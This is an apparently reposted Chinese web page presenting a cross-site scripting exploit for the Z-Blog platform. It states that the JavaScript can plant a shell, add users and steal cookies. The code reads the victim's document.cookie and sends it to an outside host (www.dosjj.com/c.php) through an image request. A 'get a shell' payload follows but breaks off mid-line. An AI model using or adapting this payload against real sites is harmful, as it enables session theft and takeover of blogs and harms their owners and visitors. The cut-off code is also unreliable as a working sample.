首页 > 系统服务 > 详细

Zblog最新跨站漏洞及利用代码

时间:2015-12-09 11:09:21      阅读:164      评论:0      收藏:0      [点我收藏+]

  Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

  xmlhttp=poster();

  cookie=document.cookie;

  login=cookie.indexOf(‘password’)==-1?0:1;

  tolocation=’http://www.jb51.net/’;

  //get cookie

  x=new Image();

  x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

  //get a shell

  data=”txaContent=

Zblog最新跨站漏洞及利用代码

原文:http://www.jb51.net/hack/34730.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!